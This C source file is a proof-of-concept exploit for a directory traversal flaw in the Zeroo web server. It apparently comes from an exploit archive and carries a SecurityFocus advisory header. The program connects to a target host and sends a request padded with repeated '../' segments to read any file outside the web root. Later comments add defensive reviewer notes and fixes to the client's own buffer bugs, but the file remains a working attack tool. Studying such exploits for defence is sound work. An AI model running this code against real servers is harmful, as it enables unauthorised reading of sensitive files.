
// source: https://www.securityfocus.com/bid/6308/info
//
// It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request containing directory traversal sequences to the vulnerable server, a remote attacker can access sensitive resources located outside of the web root.
//
// An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any file readable by the web server from outside of the web root directory.
/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 * hehe, just a copy and paste from my other directory
 * traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define FOO "../"
void get(int sd);
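/*
 * Proof-of-concept client for the Zeroo httpd directory traversal described
 * in the header of this file.
 *
 * Usage: <prog> host port file traverse_amount
 *
 * Connects to host:port over TCP and sends a single request line made of
 * "GET /", traverse_amount copies of FOO ("../"), the file argument and a
 * blank line, then hands the socket to get() to print the reply.
 *
 * Reviewer notes (defensive reading):
 *  - The request carries no HTTP version and no headers; the only unusual
 *    property is the run of "../" segments in the path. A server that
 *    canonicalises the request path and refuses anything that resolves
 *    outside its document root is not affected, and the same pattern is what
 *    to look for in access logs.
 *  - The original length check counted each "../" as one byte, so a large
 *    traverse_amount overflowed expstr on this program's own stack. The
 *    check below accounts for the real size of every component.
 *
 * Always returns 0, as the original did, including on errors.
 */
int main(int argc, char **argv)
{
    struct sockaddr_in sock;
    struct hostent *pHe;
    int sd;
    int amt;
    char *host;
    char *file;
    short port;
    char expstr[1024];
    /* fixed parts of the request: "GET /" (5) + "\n\n" (2) + NUL (1) */
    const size_t fixed_len = 5 + 2 + 1;
    const size_t foo_len = sizeof(FOO) - 1;
    size_t file_len;
    size_t reps;
    size_t off;
    size_t i;

    printf("UC-zeroo\n");
    printf("zeroo httpd remote exploit\n");
    printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
    if (argc != 5)
    {
        printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n", argv[0]);
        return 0;
    }
    host = argv[1];
    port = atoi(argv[2]); /* NOTE(review): atoi() does no validation and the value is narrowed to short */
    file = argv[3];
    amt = atoi(argv[4]);
    if ((pHe = gethostbyname(host)) == NULL)
    {
        printf("Host lookup error.\n");
        return 0;
    }
    /* Only copy the resolved address if it is IPv4 and exactly fits sin_addr. */
    if (pHe->h_addrtype != AF_INET || pHe->h_addr_list[0] == NULL ||
        (size_t)pHe->h_length != sizeof(sock.sin_addr.s_addr))
    {
        printf("Host lookup error.\n");
        return 0;
    }
    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("sock() failed.\n");
        return 0;
    }
    memset(&sock, 0, sizeof(sock));
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    memcpy(&sock.sin_addr.s_addr, pHe->h_addr_list[0], sizeof(sock.sin_addr.s_addr));
    printf("Connecting...\n");
    if ((connect(sd, (struct sockaddr *)&sock, sizeof(sock))) == -1)
    {
        printf("Failed to connect to %s.\n", host);
        close(sd);
        return 0;
    }
    printf("Setting up exploit string..\n");

    /*
     * Bound the request against the real buffer size before writing a byte.
     * A negative traverse_amount adds no "../" segments (the original loop
     * never ran for it either).
     */
    file_len = strlen(file);
    reps = (amt > 0) ? (size_t)amt : 0;
    if (file_len > sizeof(expstr) - fixed_len ||
        reps > (sizeof(expstr) - fixed_len - file_len) / foo_len)
    {
        printf("Error. Limit 1024 characters.\n");
        close(sd);
        return 0;
    }

    off = 0;
    memcpy(expstr + off, "GET /", 5);
    off += 5;
    for (i = 0; i < reps; i++)
    {
        memcpy(expstr + off, FOO, foo_len);
        off += foo_len;
    }
    printf("\tInserting file string..\n");
    memcpy(expstr + off, file, file_len);
    off += file_len;
    memcpy(expstr + off, "\n\n", 2);
    off += 2;
    expstr[off] = '\0';

    printf("Sending exploit string...\n");
    if (write(sd, expstr, off) != (ssize_t)off)
    {
        printf("Failed to send request.\n");
        close(sd);
        return 0;
    }
    /* get() loops until the peer closes and then calls exit(), so the
     * close() below is only reached if that ever changes. */
    get(sd);
    close(sd);
    return 0;
}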
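/*
 * Print everything the peer sends on sd until it closes the connection.
 *
 * Waits for readability with select(), reads up to sizeof(buf) - 1 bytes
 * and prints each chunk as a C string followed by a newline. Does not
 * return: the process exits with status 1 when the peer closes the
 * connection or when select()/read() fail.
 *
 * Reviewer notes:
 *  - The original read 1024 bytes into a 1024-byte buffer and then wrote the
 *    terminator at buf[x]: a full read stored one byte past the array, and a
 *    failed read (x == -1) stored at buf[-1]. Both are fixed below.
 *  - The data comes from the remote server and is untrusted. It is printed
 *    with "%s", so output stops at the first NUL byte in a chunk, and
 *    control characters are passed to the terminal unfiltered.
 */
void get(int sd)
{
    char buf[1024];
    ssize_t x;
    fd_set rset;

    /* FD_SET() on a descriptor outside [0, FD_SETSIZE) is undefined. */
    if (sd < 0 || sd >= FD_SETSIZE)
    {
        printf("Bad socket descriptor.\n");
        exit(1);
    }

    while (1)
    {
        /* select() modifies the set, so rebuild it on every pass. */
        FD_ZERO(&rset);
        FD_SET(sd, &rset);
        if (select(sd + 1, &rset, NULL, NULL, NULL) == -1)
        {
            if (errno == EINTR)
                continue;
            perror("select");
            exit(1);
        }
        if (!FD_ISSET(sd, &rset))
            continue;

        /* leave room for the terminator written below */
        x = read(sd, buf, sizeof(buf) - 1);
        if (x == 0)
        {
            printf("Connection closed by foreign host.\n");
            exit(1);
        }
        if (x < 0)
        {
            if (errno == EINTR)
                continue;
            perror("read");
            exit(1);
        }
        buf[x] = 0; /* terminate the chunk before printing it as a string */
        printf("%s\n", buf);
    }
}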